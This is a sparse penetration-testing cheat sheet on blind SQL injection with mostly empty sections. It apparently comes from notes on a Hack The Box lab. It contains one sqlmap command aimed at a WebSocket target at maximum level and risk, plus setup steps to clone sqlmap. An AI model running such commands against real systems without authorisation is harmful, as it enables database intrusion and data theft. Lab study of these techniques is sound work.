PRIMARY CATEGORY → BLIND SQLI

Theory

🛠️⌛


Abuse

HTTP[s]
  • Custom Python Script

Binary Search

See SQLMap

WebSockets
  • Custom Python Script

Binary Search

Setup

git clone 'https://github.com/sqlmapproject/sqlmap' SQLMap
cd !$

Usage

python3 sqlmap.py --url 'ws://<TARGET>:<PORT>' --data '{ "<PARAMETER>" : "*" }' --level 5 --risk 3 --random-agent --batch --threads 10
Resources

Soccer Machine HTB